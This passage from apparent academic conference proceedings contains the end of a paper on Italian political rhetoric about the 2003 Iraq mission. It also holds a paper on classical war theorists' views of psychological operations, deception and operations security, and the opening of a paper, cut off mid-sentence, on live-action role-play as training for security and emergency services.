parties, among which the most important are Forza Italia, a populist neo-liberalist party of the Prime
minister, Silvio Berlusconi, and Alleanza Nazionale, classified by the political scientists as a post-Fascist
party, the secretary of which, Gianfranco Fini, was the Vice prime minister in spring 2003. (Ignazi 1994;
Tarchi 1995)
To gain an important role in international politics has been the goal of Italian politicians since the
unification of the country, from the second half of the nineteenth century till now. Italy could justify its
claims on economic grounds (the country was a member of the former G7) or on demography (with a
population of more than 60 million inhabitants, it was the fourth largest country in the EU at that time).
However, this is not the case. As in Mazzini’s rhetoric the justification is found in the intrinsic Italian spirit
and in history, so the Berlusconi government’s argumentation appealed to the Italian role in the world as
missionaries of goodwill. There are clear affinities between the rhetoric of Mazzini and of the government
in the spring of 2003; yet the latter, instead of Roman legionaries, sent to “Mesopotamia” a group of
“Catholic Saints”. Whether in practice there is any difference between these two, is another question.
References
Breda, M. (15.4.2003) “Emergenza umanitaria, l’apertura del Quirinale” Il Corriere della Sera.
Caprara, M. (16.4.2003) “Il parlamento vara la missione a Bagdad” Il Corriere della Sera.
Caprara, M. (20.4.2003) “Soldati al Sud, aiuti al Nord. Doppio problema per l’Italia” Il Corriere della Sera.
Di Caro, P. (11.4.2003) “’Non conto sulla sinistra per l’Iraq’” Il Corriere della Sera.
Di Caro, P. (17.4.2003) “Noi e gli Usa semineremo democrazia” Il Corriere della Sera.
Fairclough, N. (1995) Media Disourse, Arnold, London.
Fowler, R. (1991) Language in the News. Discourse and Ideology in the Press, Routledge, London and New York.
Fowler, R., Hodge, B., Kress, G. and Trew, T. (1979) Language and Control, Routledge, London.
Franchi, P. (16.4.2003) “Ritorno alla ragione” Il Corriere della Sera.
Fregonara, G. (14.4.2003) “Aiuti e truppe, domain il voto” Il Corriere della Sera.
Halliday, M.A.K. (1976) Language as Social Semiotic. The Social Interpretation of Language and Meaning, Edward
Arnold, London.
Hodge, B. and Kress, G. (1996) Language as Ideology, Routledge, London. http://archiviostorico.corriere.it/
http://www.rcsmediagroup.it/wps/portal/mg/home/?language=it
Ignazi, P. (1994) Postfascisti? Dal Movimento sociale italiano ad Alleanza nazionale,
Bologna, Il Mulino.
Ivanič, R. (1998) Writing and Identity: The discoursal construction of identity in academic writing, John Benjamins,
Amsterdam.
La Penna, A. (1973) “La tradizione classica nella cultura italiana.” Storia d’Italia, vol. II. Einaudi, Torino.
Lehtonen, M. (2000) Merkitysten maailma. Kulttuurisen tekstintutkimuksen lähtökohtia . Vastapaino, Tampere.
Lo Cascio, V. (1991) Grammatica dell’argomentare. Strategie e strutture, La Nuova Italia, Scandicci.
Lo Zingarelli (2003) Vocabolario della lingua italiana di Nicola Zingarelli, Zanichelli, Bologna.
Mazzini, G. (1860) Doveri dell’uomo, http://www.liberliber.it/biblioteca/m/mazzini/index.htm
Nese, M. (18.4.2003) “Soldati e mezzi a Bagdad non prima di due mesi e sotto comando inglese” Il Corriere della
Sera.
Nese, M. (4.5.2003) “Agli italiani il controllo dei villaggi” Il Corriere della Sera.
Perelman, C. (1996) Retoriikan valtakunta [L’empire rhétorique], Vastapaino, Tampere.
Sarzanini, F. (10.4.2003) “La squadra: carabinieri, sminatori ed esperti di armi chimiche” Il Corriere della Sera
Tarchi, M. (1995) Cinquant’anni di nostalgia. La destra italiana dopo il fascismo, Rizzoli, Milano.
Tuomarla, U. (2000) La citation mode d'emploi sur le fonctionnement discursif du discours rapporte direct,
Suomalainen Tiedeakatemia, Helsinki
Verderami, F. (13.4.2003) “I Paesi amici dei terroristi ora lo sanno Possibile colpire chi mianccia la pace” Il Corriere
della Sera.
Verderami, F. (15.4.2003) “Un patto con Bush prima della Guerra: subito forze italiane” Il Corriere della Sera.
Visser, R. (1992) “Fascist Doctrine and the Cult of the Romanità” Journal of Contemporary History, Vol. 27, No. 1,
pp.5-22.
126

Thoughts of war Theorists on Information Operations
Arto Hirvelä
National Defence University, Helsinki, Finland
arto.hirvela@mil.fi
Abstract: Information operations (INFO OPS) increase in value as a means to reach ends in wars and lesser crises.
Nowadays, the effectiveness of information operations depends on knowledge and the control of all of its different
aspects as well as on the ability to utilize superior technology. Not all methods of INFO OPS require a significant
technological advantage, nor are they generated by it even though a great many of the vulnerabilities are based on
technology. Even some ancient war theorists have written about the value of some INFO OPS methods, e.g.,
psychological operations and military deception. Even though psychological operations as such were not included in
war plans in the age of the war theorists covered in this article due to a lack of media, proper means and the
slowness of communication, every theorist acknowledged the value of psychological operations. Revolution in
military affairs (RMA) has been discussed at length by military researchers. INFO OPS is one of the concepts been
used to rationalize RMA. Consequently the development of INFO OPS must be scrutinised. In this article the
thoughts of war theorists Sun Tzu, Flavius Vegetius Renatus, Maurice de Saxe, Napoleon Bonaparte, Carl von
Clausewitz and Sir Basil Liddell Hart are analyzed from viewpoint of various aspects of INFO OPS. The analysis
concentrates on psychological operations, on military deception and on operations security. The analysis is based on
a loose framework of content analysis.
Keywords: information operations, psychological operations, military deception, operations security, war theorist
1. Introduction
Even without having modern information technology to reach the masses, war theorists perceived the
value of the methods that we now call information warfare or information operations. The tools of
psychological operations and military deception were obviously different then but the advantages of these
methods and operations security have existed since the concept of war was invented. This is clearly
present even in the writings of the ancient war theorists’.
Affecting opponent’s morale in previous times is what we now call Psychological Operations.
Psychological Operations (PSYOPS) are described as planned psychological activities using methods of
communication. This includes the use of media products, face-to-face communication and other means
directed at target audiences in order to influence perceptions, attitudes and behaviour in order to reach
political and military objectives. Present-day PSYOPS are conducted to convey selected information and
indicators to governments, organisations, populations, groups and individuals, with the aim of ultimately
changing their behaviour and decisions. These aims do not differ from the aims that the aforementioned
theorists describe. Successful PSYOPS weaken the will of an adversary, reinforce the feelings, stimulate
the co-operation of the loyal and sympathetic, and gain the support of the uncommitted. (MNIOE 2009)
Deception has been the decisive part of many successful offensives. Deception is complex and demands
considerable effort and understanding of an adversary's way of thinking. Deception operations require a
way to hide or cover real action and to deny critical information of both real and deceptive activities.
Knowledge of deception plans must be carefully protected and distributed only to those crucial to the
deception operation. Deception during operations can directly contribute to the achievement of surprise
and indirectly to security and economy of effort. Deception operations must not affect the credibility of the
forces or higher authorities. (MNIOE 2009)
Counter Intelligence and Operations Security have and are being used to protect critical information from
falling into enemy hands. Operations Security (OPSEC) is an analytical process intended to reduce risk
to a military operation by adversary intelligence exploitation, and maintain freedom of action by
preventing an adversary’s foreknowledge of friendly dispositions, capabilities and intentions.
The OPSEC as a process identifies critical information and determines what indicators hostile intelligence
systems may obtain that could be used to derive critical information in time to be useful to adversaries.
OPSEC then analyses the susceptibility of information to exploitation by an adversary’s intelligence
(vulnerabilities) and operational capabilities, motivation, and intentions designed to detect and exploit
vulnerabilities (threat analysis). OPSEC also assesses the potential degree to which critical information is
subject to loss through the exploitation of an adversary (risk analysis) and then selects and executes
counter-measures that eliminate or reduce the vulnerabilities to an acceptable level.
127

Arto Hirvelä
OPSEC is concerned with the achievement of secrecy and surprise in military operations and activities by
protecting capabilities and intentions from hostile intelligence exploitation. The ultimate objective is to
prevent an adversary from obtaining sufficient information in a timely manner to predict and degrade
one’s operations or capabilities. Effective OPSEC contributes to Information Superiority.
OPSEC concentrates on those activities that could indicate the existence of an organisation, an
impending operation or its details, or that could reveal intentions, dispositions, capabilities and potential
vulnerabilities. These activities are then protected using a range of counter-measures. (MNIOE 2009)
2. War theorists’ views
2.1 Sun Tzu
Sun Tzu described the tenets of warfare over two thousand years ago. In his maxims he takes into
consideration many aspects that we now include in information operations. Subsequent theorists more or
less follow his ideas.
Sun Tzu sees INFO OPS as a means to achieve supreme excellence in warfare. His often quoted
statement “to fight and conquer in all your battles is not supreme excellence; supreme excellence
consists in breaking the enemy's resistance without fighting” is a basic concept in INFO OPS. Sun Tzu’s
advice is to defeat the enemy’s plans and not to attack the enemy's army on the field, where possible.
(Sun Tzu 1998)
Sun Tzu discusses psychological operations over chapters. He concludes that a whole army may be
robbed of its spirit; a commander-in-chief may be robbed of his presence of mind. (Sun Tzu 1998) Sun
Tzu advice that when you surround an army, leave an outlet free and do not press a desperate foe too
hard, is echoed in the writings of Vegetius.
Sun Tzu gives military deception a lot of credit by stating that all warfare is based on deception. (Sun Tzu
1998) He bases the use of military force on always appearing to be what you are not and where you are
not supposed to be.
Sun Tzu gives several examples of OPSEC for the purposes of military deception. He states that by
discovering the enemy's dispositions and remaining invisible ourselves we can keep our forces
concentrated, while the enemy's must be divided. He also continues that the place where we intend to
fight must not be made known, for then the enemy will have to prepare against a possible attack at
several different points, which makes him weaker. Sun Tzu concludes that in making tactical dispositions,
the highest thing you can attain is to conceal them, because then you will be safe from the prying of the
subtlest spies and from the machinations of the wisest brains. (Sun Tzu 1998)
2.2 Flavius Vegetius Renatus
Flavius Vegetius Renatus acknowledged the essence of operations’ security, military deception and
psychological operations and thus all the aspects of INFO OPS of his time. About deception he
concluded that the Romans were always unequal to the Africans in deception and stratagem. (Vegetius
2004) However, he stated that an able general never loses a favourable opportunity to surprise the
enemy. The complexity of deception or the rigid organization of Romans did not prevent them from
seeking the advantage of surprise.
Vegetius emphasized military training and hardening soldiers. He stated that few men are born brave.
Many become so through training and force of discipline. The courage of the soldier is heightened by the
knowledge of his profession. (Vegetius 2004) A courageous soldier is less susceptible to intimidation by
the enemy. Vegetius did acknowledge the value of psychological operations also by stating that to
seduce the enemy’s soldiers from their allegiance and encourage them to surrender is of special service,
for an adversary is more hurt by desertion than by slaughter. (Vegetius 2004) Desertion of a man could
also lead to the desertion of many more and therefore also diminish the opponent’s view of his own
leadership. Vegetius understood that giving the enemy the chance to leave combat would tempt him to
desert or retreat. That is why he stated that generals unskilled in war think a victory incomplete unless the
enemy are so straightened in their ground or so entirely surrounded by numbers so as to have no
possibility of escape. Vegetius clarified that when the enemy has free room to escape he thinks of
nothing but how to save himself by flight, and as the confusion spreads, great numbers are cut to pieces.
128

Arto Hirvelä
On the other hand, weak and few in number, becomes a match for the enemy from this very reflection,
that it has no resource but in despair just fight. (Vegetius 2004) In giving an enemy a way to surrender a
skilled commander tempts them to do so.
Vegetius understood the meaning of operations security. His advice is that leaders should consult with
many people on the proper measures to be taken, but communicate the plans they intend to put in
execution to a select few of the most assured fidelity: or rather, trust no one but themselves. He also
knows the meaning of having one’s operations security fail and recommends that when you find out the
enemy has knowledge of your designs you must immediately alter your plan of operations. (Vegetius
2004) Vegetius was — as in OPSEC now — concerned with the achievement of secrecy and surprise
through protecting capabilities and intentions from hostile intelligence exploitation. The objective was
then, as it is now, to prevent an adversary from obtaining sufficient information in a timely manner to
predict and degrade our operations or capabilities.
Although Vegetius did not use the modern terms of INFO OPS, he used many of the means of modern
INFO OPS.
2.3 Maurice de Saxe
Marshal Maurice de Saxe stated that it is not the big armies that win battles, it is the good ones. He also
acknowledged the value of psychological effects by stating that hope encourages men to endure and
attempt everything; in depriving them of it, or in making it too distant, you deprive them of their very soul.
(de Saxe 1944) Even though de Saxe focused on economical inspiration, he repeated Vegetius’ advice
about maintaining good discipline.
2.4 Napoleon Bonaparte
Napoleon stated that in war you should never do what the enemy wishes you to do, for the reason that he
desires it. (Chandler 2002) The tools for keeping the opponent unaware of your true intentions are
OPSEC and military deception. Napoleon’s means of OPSEC and protection of plans were based mostly
on centralized command, which he emphasized frequently. (Chandler 2002) Napoleon organized his
command so that he was able to control subordinates himself of through aides who had the authority to
make changes to orders. This speeded up the decision cycle and enhanced operation security giving
Napoleon an advantage against his opponents. (Britt & Griess 2003) He also used deception to lure
opponents into a trap thus causing more casualties with fewer troops. (Barnet 1978)
Napoleon Bonaparte stated that the moral is to the physical as three to one, acknowledging the value of
psychological operations. (Liddell Hart 1991) About the courage Napoleon stated that it is the second
quality required from the soldiers (Chandler 2002).
He also stated that the secret of war lies in the communications and brings up its significance many
times. (Chandler 2002) Lines of communication need to be protected and enemy lines threatened. Lines
of communication may also be used to deceive by luring the enemy to target false lines.
2.5 Carl von Clausewitz
Carl von Clausewitz acknowledged the physical and psychological aspects of war. He repeatedly used
concepts like physical and moral power, force and superiority. (Clausewitz 2008) According to him,
physical power alone is not enough since moral power is also essential to victory in war. Battles may be
won without fighting if the opponent perceives the other side to be much stronger and yields as a result.
(Clausewitz 2008) The opponent’s understanding of the situation may be manipulated with deception and
psychological operations. Clausewitz emphasized that when destroying enemy forces, nothing obligates
us to limit this idea to physical forces; the moral element must also be taken into account. He understood
and described, in the same way that Vegetius did, that a great destructive act – a major victory – may be
achieved through psychological effects, as the moral factor is the most fluid element of all, and therefore
spreads most easily to affect everything else. (Clausewitz 2008)
Clausewitz writes about the destruction of military power, that is, it must be reduced to such a state as
not to be able to prosecute war. (Clausewitz 2008) That might also mean that the enemy’s will to oppose
is taken which may be done with psychological operations. Clausewitz also states that “even when the
enemy is no longer able to prosecute the war and his land is conquered, still the war, that is, the hostile
129

Arto Hirvelä
feeling and action of hostile agencies, cannot be considered as at an end as long as the will of the enemy
is not subdued also”. (Clausewitz 2008) Therefore, according to Clausewitz, it may be concluded that
reducing the enemy’s military power to such a state that it is no longer able to prosecute war is not
enough; the will of the opposing agencies must also be subdued.
On the other hand, Clausewitz recognized that there are many ways to reach the aims of war, that the
complete subjugation or the outright defeat of the opponent is not essential in every case. (Clausewitz
1989) The opponent may be persuaded or compelled by the means of psychological operations to lose
his will or moral force as Clausewitz described. Moral elements are, according to Clausewitz, among the
most important in war. (Clausewitz 1989)
For Clausewitz surprise is an independent element that has the psychological effect of gaining
superiority. Surprise is produced by speed and secrecy. (Clausewitz 1989) Clausewitz did not consider
military deception to be a very effective tool. He considered deception to have so little strategic value that
it should only be used only if a ready-made opportunity presents itself. (Clausewitz 1989)
2.6 Sir Basil Henry Liddell Hart
All in all Liddell Hart understood the overall importance of non-lethal methods like INFO OPS and stated
that it is more potent, as well as more economical, to disarm the enemy than to attempt to destroy him by
hard fighting. He continues that a strategist should think in terms of paralyzing, not of killing.
He recognized the value of military deception in stating that the most effective indirect approach is one
that lures or startles the opponent into a false move. Deception can then directly contribute to the
achievement of surprise and indirectly to security and economy of effort as stated in the present
description of the term (MNIOE 2009).
Liddell Hart took the idea of psychological operations further with the advice that “even on the lower plane
of warfare, a man killed is merely one man less, whereas a man unnerved is highly infectious carrier of
fear, capable of spreading an epidemic of panic. On a higher plane of warfare, the impression made on
the mind of the opposing commander can nullify the whole fighting power that his troops possess. And on
a still higher plane, psychological pressure on the government of a country may suffice to cancel all
resources at its command – so that the sword drops from a paralyzed hand” (Liddell Hart 1991) Liddell
Hart thus reiterated what Vegetius had stated before, that it is better to affect mind than body because
psychological effects cause more damage to the opponent. With psychological effects the battle can be
won, as Sun Tzu stated, without fighting.
Liddell Hart continued to acknowledge the value of psychological operations and the protection of one’s
own spirit and stated that to foster the people's willing spirit is often as important as possessing the more
concrete forms of power (Liddell Hart 1991). He also wrote about in his action of strategy that in studying
the physical aspect we must never lose sight of the psychological, and only when both are combined is
the strategy truly an indirect approach, calculated to disturb the opponent’s balance (Liddell Hart 1991).
Liddell Hart led his ideas from previous war leaders’ comments and dilemmas such as how to achieve the
moral breakdown of the enemy before the war has started (Liddell Hart 1991). He concluded that in the
end it is loss of hope rather than loss of life that decides the issues of war.
3. Conclusion
The importance of affecting opponents’ minds has been acknowledged at least from the days of Sun Tzu.
All of the theorists mentioned in this article discuss psychological operations. The means of affecting the
opponent’s mind were of course more limited in those times in comparison to our current era of mass
media where the media has brought new ways to affect. As with many developments, media can be just
as much an asset as a hindrance in warfare.
Military deception has been effectively used in warfare throughout history. In about three-quarters of
military operations conducted during the 18 th century, a surprise was achieved through deception. Of the
theorists discussed here, Clausewitz is surprisingly the one who did not consider military deception to be
very effective. This might be because he was concerned with essence of war on a more strategic level as
a mean to achieve political objectives. Most theorists do acknowledge the importance of deception and
the keeping of plans and manoeuvres secret from the enemy through OPSEC.
130

Arto Hirvelä
Revolution in military affairs has been discussed at length by military researchers. However, in light of the
writings of former war theorists, there seems to be more of a revolution in military technology rather than
in warfare in general. The same basics from the time of Sun Tzu still apply and are emphasized in the
writings of subsequent theorists. However, the information environment in which military operations are
being conducted has expanded greatly both in content and scope.
Military operations have changed from the times of the war theorists dealt with in this article. The modern
operations area usually includes not only our own and opponent’s forces but also neutral locals, nongovernmental
organizations, multinational actors and global audiences through media. The information
environment of military operations has expanded to cover entire world and any effects in it are very
prompt. This has given new challenges to the analyzing of information environment.
Previous war theorists considered the target of INFO OPS to always be the opponent. As military
operations become more comprehensive and information environment expands, targets also include
neutral parties, allies and even one’s own people.
War theorists perceived the value of methods that we now call information operations. Psychological
operations, military deception and operations security are not new ways to conduct war, but there are
new ways of using those elements in warfare and new collateral effects to consider.
References
Barnet, Correlli (1978) Bonaparte, George Allen & Unwin Ltd. pp 116–117.
Britt, Albert Sidney & Griess, Thomas E. (2003) The wars of Napoleon, New York, Square One Publishers. Available:
http://books.google.com (19.1.2011) pp 35–36.
Chandler, David G. (2002) The Military Maxims of Napoleon, Translated by Sir George C. D’Aguilar, London,
Greenhill Books. pp 59, 61, 69, 74, 77.
Clausewitz (1989) On War, edited Michael Howard & Peter Paret, New Jersey, Princeton University Press. pp 94,
184, 198, 202
Clausewitz (2008) On War, Translated by J.J. Graham, Digireads.com Publishing. Available http://books.google.fi
(19.1.2011) pp 37, 50, 96, 97, 157, 165, 384, 486, 510
de Saxe, Maurice (1944) Reveries on the Art of War, Translated and edited by Thomas R. Phillips, Harrisburg,
Pennsylvania, The Military Service Publishing Company. p 27.
Liddell Hart, Basil (1991) Strategy, second revised edition, New York, Penguin Books. pp 5, 208, 212, 322, 327
MNIOE Applied Concept (2009) The Military Information Operations Function within a Comprehensive and Effects-
Based Approach, Final Draft Version 3.0, Bonn, MNE5. pp 18–22.
Tzu, Sun (1998) Sodankäynnin taito, Art of War, Helsinki, Tietosanoma Oy. pp 76, 86, 105, 107, 114, 116–117.
Vegetius (2004) Vegetius Epitoma Rei Militaris, edited by M.D.Reeve, Oxford, Clarendon Press. pp 6, 108–109, 117,
119
131

Live-Action Role-Play as a Scenario-Based Training Tool for
Security and Emergency Services
Sara Hjalmarsson
Edith Cowan University, Joondalup, Western Australia
shjalmar@our.ecu.edu.au
Abstract: Appropriate training and knowledge development is highly relevant to leaders and security professionals in
the fields of information warfare and counter-terrorism. Scenario-based training methodology has a long history
among military, law enforcement, emergency services and the private sector. It is recognised as an effective method
for preparing leaders to make critical decisions under pressure. Over time, several models have been developed to
illustrate its components and characteristics. Live-Action Role-Play (LARP) has been defined as a unique art form
that, like scenario-based training, can only be experienced as it is being created. It is an international phenomenon
with a diverse range of styles and characteristics. The current leading-edge developments occur in the Nordic
countries (Sweden, Denmark, Finland and Norway). Although LARP is primarily used for entertaining games, the art
form bears significant resemblance to scenario-based training and could be adapted for authentic tasking exercises.
LARP contrasts with scenario-based training in its use of persona within a variable narrative engine and a context
that includes many layers of complexity. Educational Live-Action Role-Play, known as Edu-LARP, has been
integrated into the Danish school system via Østerskov Efterskole, a boarding school for students aged 14-17 that
follows the Danish national curriculum. LARP participants are already being used in training exercises for emergency
services due to their dynamic improvisation skills and cost-effectiveness. Experienced organisers and participants
could contribute their ability to generate scenarios, work with uncertainty and ”think like the enemy, without becoming
the enemy.” to the design and execution of training exercises. Additionally, they could contribute to scenario
generation for scenarios involving a high level of uncertainty, such as terrorist attacks and critical infrastructure
incidents. LARP events themselves could also be adapted to the training needs and attributes of the audience,
creating training that fully engages the trainee and results in improved learning outcomes. As in the case of scenariobased
training, the use of LARP, LARP participants and LARP organisers must be implemented appropriately for
them to be effective. This implies, for example, that participants and organisers must be experienced. It also implies
that LARP used for training purposes would demand an appropriate narrative engine, educational framework and
level of complexity suitable to the audience. Although this paper identifies that there is significant potential in the
LARP art form, it also recommends that further research be conducted to explore the relevance of different styles,
aspects relating to effective implementation and possible other uses of the art form.
Keywords authentic tasking, critical infrastructure protection, scenario generation, scenario-based training, liveaction
role-play, edu-LARP
1. Introduction
All good training methods should include some form of simulation. LARP can add an
element of uncertainty to it.
Lunau 2010
There exists a significant need to prepare leaders for decision-making in a crisis situation (Moats,
Chermack, and Dooley 2008). Appropriate training and knowledge development is highly relevant to
security professionals within the fields of information warfare and counter-terrorism. This is particularly
important to critical infrastructure industries where incident consequences may impact significantly on the
continuity of other industries. Games and role-play have been effectively used in the past for training
purposes and Live-Action Role-Play (LARP) offers another step in this continuum due to its inherent
similarities to scenario-based training (Bowman 2010, Blanchard & Thacker 2010).
This paper builds on the work of Burns, Cannon-Bowers, Pruitt and Salas 1998, Burke & Salas 2002 and
Cohn, Lyons and Schmorrow 2002, briefly outlining their training models. Based on these models, the
processes of LARP and scenario-based training have been compared and contrasted. This is an
explorative paper and does not aim to propose a complete solution, but rather highlight an emerging
discipline that may offer a valuable contribution to planning, simulation and training related to information
warfare. Further research will be necessary to establish how LARP can contribute, where it is appropriate
and where it is not appropriate.
For the sake of consistency, certain conventions of definition and terminology will be used within this
paper. Please note that the Nordic LARP conference will be referred to by its Norwegian name
(Knutepunkt) for the purpose of this essay as the first conference was held in Norway. This paper shares
132

Sara Hjalmarsson
the approach of the Knutepunkt publications and the ELIN (Education-LARPer's International Network),
which consider LARP as a distinct art form, rather than a form of theatre or wargame.
2. Scenario-based training
Scenario-based training differs from traditional training in a several aspects. It focuses on the acquisition
of complex tasks and was originally developed to support team training (Burns, et al, 1998, Oser, 1999).
In this method of training, the curriculum is organised within a systematically developed scenario, rather
than a conventional curriculum (Burns, et al. 1998, Oser 1999). Such training has been used by military,
police, emergency services and the private sector to prepare trainees for a variety of situations by
simulating the real experience. The USA's Federal Bureau of Investigations has put new recruits through
a 14- week long simulation of an investigation that included a mock trial (Whitcomb, 1999; Van Hasselt,
et al., 2008). The Mecklemburg EMS Agency, also in the USA, has a fully integrated simulation studio for
training emergency medical personnel (Bioterrorism week, 2007). Even the first army post-mobilisation
training for Iraq included a scenario-based training model called Theatre Immersion (Honoré and Zajac,
2005).
Effectively implemented scenario-based training has a number of benefits. Its simulation-based
methodology has proven more effective than problem-based training for acquiring critical assessment
and management skills (Steadman et al. 2006). It can also provide trainees with authentic tasking
exposure and the opportunity to evaluate multiple potential outcomes of a situation (Moats, et al., 2008;
Oser, 1999; Burke & Salas, 2002). Additionally, it can serve to reduce training costs without
compromising training quality (Burke et al, 2006). The effective use of scenario-based training depends
on appropriate implementation. Poorly implemented, scenario-based training may result in the wrong
thing being learned, inadequate focus on the relevant skills or failure to relate training to the real-world
environment. Consequently, the scenarios and training programs must be engineered to achieve the
desired objectives and a number of models have been developed to illustrate this process. (Burns, et al,
1998; Burke & Salas, 2002; Oser, 1999).
Figure 1 illustrates the scenario-based training cycle as described by Burns et al in 1998 and further
adapted by Burke & Salas in 2002. The first step of this cycle involves specifying training objectives and
competencies (2 and 3), based on analytical approaches. An understanding of the knowledge, skills and
attitudes that are characteristic of effective performance (KSAs) is critical at this stage. The first step must
then drive the second (4) where the scenario and it's tasks are crafted to allow the trainees to perform the
targeted skills, so they may be effectively assessed. If the scenario is not developed explicitly to exercise
objectives, valuable time will be lost on non-essential elements. In the third step (5) performance
measures and standards for evaluating the trainees are developed. If this step is effectively executed, it
becomes possible to both determine what was done well and why a particular behaviour occurred. This
makes it possible to identify and address deficiencies in the trainee's knowledge. Thus, diagnostics can
be created that are then used to assess and provide feedback to the trainee(s) (6). Finally, the
performance information must flow into the next training session, so it may build on, rather than duplicate,
the trainee's knowledge (1).
Figure 1: The components of scenario-based training, adapted from Burns et al. (1998) and Burke &
Salas (2002)
133

Sara Hjalmarsson
Cohn et al. (2002) offer a similar model that places the components of scenario-based training into three
phases comprising planning, execution and assessment. This model is illustrated in Figure 2 (Vincenzi,
2008, pp. 207-208). In this model, the planning phase involves the development of clear instruction
objectives and identification of the tasks that the trainee is to undertake. These tasks are linked to the
learning or training objectives of the trainee and consequently, the competencies desired. During this
phase, the focus of the scenario is documented based on the skill inventory and the historical
performance of the training audience (Vincenzi, 2008, pp. 207-208).
Figure 2: The SBT cycle, adapted from Vincenzi (2008), p.208
3. Live-action role-play and educational live-action role-play
Live-Action Role-Play (LARP) has been described as an art form that is unique due to its participatory
nature. There is no audience and LARP is not usually recorded. Rather, it is experienced exclusively in
first-person. Instead of a script, guidelines and constraints are used for direction.
Similarly to scenario-based training, LARP can only be experienced through direct participation in a live
event such as an activity, exercise or production. There are also international conferences held on the
topic of LARP, of which Knutepunkt is regarded as the most influential. Although LARP is an international
phenonmenon, the current leading-edge developments have been identified as occurring in the Nordic
countries (Interacting Arts, 2010). The Nordic LARP tradition has also been documented by Stenros &
Montola (2010).
LARP offers a unique narrative medium that has been used for many different purposes. The events
themselves are primarily used for entertainment, but have also found value within television productions
such as the Danish Barda. Another popular use is for games, such as White-Wolf's Vampire, the German
Drachenfest event, the UK campaign Manticore and so on. LARP has also found its use within traditional
education through Østerskov Efterskole, a Danish boarding school for students aged 14-17, which follows
the Danish national curriculum (Hyltoft, 2008). Additionally there exists an international network of
researchers and individuals that already use LARP within the traditional school system, for adult
education and in social work (ELIN 2010). This network is known as ELIN (Education-LARPers
International Network).
When used within an educational context, LARP is called Educational Live-Action Role-Play (Edu-LARP)
(ELIN 2010). Edu-LARP resembles scenario-based training in the sense that the scenario becomes the
curriculum. At Østerskov Efterskole an educational framework and narrative engine fill a function similar
to the scenario in scenario-based training. Within this, the students take on a role different from the self
134

Sara Hjalmarsson
and an element that demonstrates one's participation (eg. a costume). Roles and costumes do not
necessarily need to be complex and can be symbolic in nature. The use of a role that is different from the
self allows the student an opportunity to learn from mistakes in a safe environment without identifying
personally with them.
Other elements critical to the success of Edu-LARP include preparation before the LARP event,
participation during it, evaluation after the event is over and the incorporation of perceived free will.
During the preparation stage, the scene is set, characters are created and self-study, research, seminars
or tutorials take place. During the LARP event, the participating student becomes deeply engaged in the
activity, which improves his or her learning (Hyltoft, 2010, Lunau, 2010).
The evaluation stage that follows the LARP activity coincides with the recommendations made by Burke
& Salas (2002) and Vincenzi (2008) for scenario-based training who advise this step to gauge participant
learning. The perception of free will is about allowing the learner to make logical decisions without being
hindered by non-contextual constraints. It implies that any prescribed options must have a viable
foundation within the narrative framework (Hyltoft, 2010).
Figure 3: The Edu-LARP cycle, adapted from Hyltoft (2010) and Lunau (2010)
The students at Østerskov Efterskole are often used in training exercises conducted by local emergency
services. They are preferred to others due to their dynamic improvisation skills and cost-effectiveness. As
their skills improve, they become able to work with uncertainty, develop scenarios and, as stated by
Lunau 2010, “think like the enemy, without becoming the enemy” (Hyltoft, 2010, Lunau, 2010). Presently,
there exists little academic research and documentation on the subjects of LARP and Edu-LARP.
Montala & Stenros (2010) and Bowman (2010) have conducted academic research and published
comprehensive material on the subject. However, much of the documentation currently available is
informal and may consist of online videos, articles on wikis, discussions in forums or material in online
intranets. In addition, documentation is not always available in English. A scripted scenario involving a
staged attack on a car in the event Skymningsland (discussed later in this paper) is publicly available on
Youtube (Postapoka, 2010), but it is in Swedish. The Skymningsland post-event presentation is also
available on Youtube (Supernaut242, 2010), but is also only available in Swedish. This can make it
challenging to find useful data. Furthermore, there are significant regional differences in nomenclature
and practice. These offer a hurdle to researching the subject and obtaining verifiable reference material.
Another concern that has been voiced about LARP revolves around disappointing or unpleasant
experiences. Some people participate in a particular event and either do not enjoy it or gain nothing from
it. An explanation for this phenomenon is that LARP and Edu-LARP events have different styles and
characteristics and if a participant's personal preference does not align with a particular style, his or her
135

Sara Hjalmarsson
experience may be unrewarding (Mäkelä, Koistinen, Siukola, Turunen, 2005). For this reason, it is helpful
to understand some of the different models. The GNS theory developed by Edwards (2001) is referred to
in Mäkelä et al. (2005) and offers a useful classification model. An extensive discussion of LARP models
and LARP theory is outside the scope of this paper. Anyone who wishes to read further about LARP
models and theories, both Mäkelä et al. and Montola & Stenros (2010) provide a detailed overview.
Figure 4: The three orientations illustrated as corners of an equilateral triangle, adapted from Mäkelä et
al (2005) and Kim (2003a, 2003b and 2005)
The Gamist orientation focuses on competition between participants as entertainment. Victory and loss
conditions are very clear-cut, such as through a measure of points.
Narrativist events focus on creating story and drama. The entertainment factor created in these events
also differs from that of gamist events.
Immersionist/Simulationist oriented events can resemble simulations. This type of event requires a
unique set of skills from both the organiser and the participant. Such an event involves the greatest level
of immersion into the scenario and role.
4. A case study
To compare and contrast LARP and scenario-based training, a case study was conducted of the Swedish
LARP production Skymningsland (informally referred to as Duskland in English), organised by the nonprofit
association Lajvföreningen Solnedgång in 2010. Skymningsland was a realistic 4-day event set in a
fictitious, contemporary post-conflict environment. The activities of the organisers were followed via direct
communication using email and chat; the event website, intranet and forum; recordings of event
presentations; direct observation of pre-event meetings, observation of the event itself and video
recordings of the post-event presentation at Snakkeklubben 2010. Participant activities were followed via
the event intranet, forum, emails, participant meetings, workshops and a participant survey. The case
study revealed similarities and differences between scenario-based training and those of LARP. The
Skymningsland production commenced with an extensive planning and preparation phase. During this
phase, the organisers scouted locations, planned and budgeted. Feedback from previous events and
peers served to guide them as the scenario, narrative, context and scripted scenarios were developed.
Guidelines, graphics and literature was created and made publicly available via the event website.
Skymningsland was formally announced at the Knutepunkt conference in April, 2010 and the 2010 Prolog
LARP convention, later in the year (Utbult, et al., 2010).
Once an individual registered, they were required to design and describe the fictitious character they
wished to play. They were also required to list any real-world skills that could be useful in the event (eg.
stage fighting, pyrotechnics licence, first aid training, etc.). To assist in developing an appropriate
character, the website provided a list of suggested reading and viewing in addition to the guidelines,
136

Sara Hjalmarsson
literature and concept art. Individual coaching was also offered for free to each participant and involved
both feedback on the submitted description and personal advisory. (Lajvföreningen Solnedgång, 2010a;
Utbult, et al., 2010). Once approved, the fictitious character descriptions became searchable and could
be viewed by other registered participants. This allowed them to identify other participants with which to
collaborate and build fictitious relationships, create mini-scenarios, or develop and rehearse scripted
scenes within the constraints of the event guidelines. The participants task during the event consisted of
fulfilling these mini-scenarios and responding to scenarios arising spontaneously due to the improvised
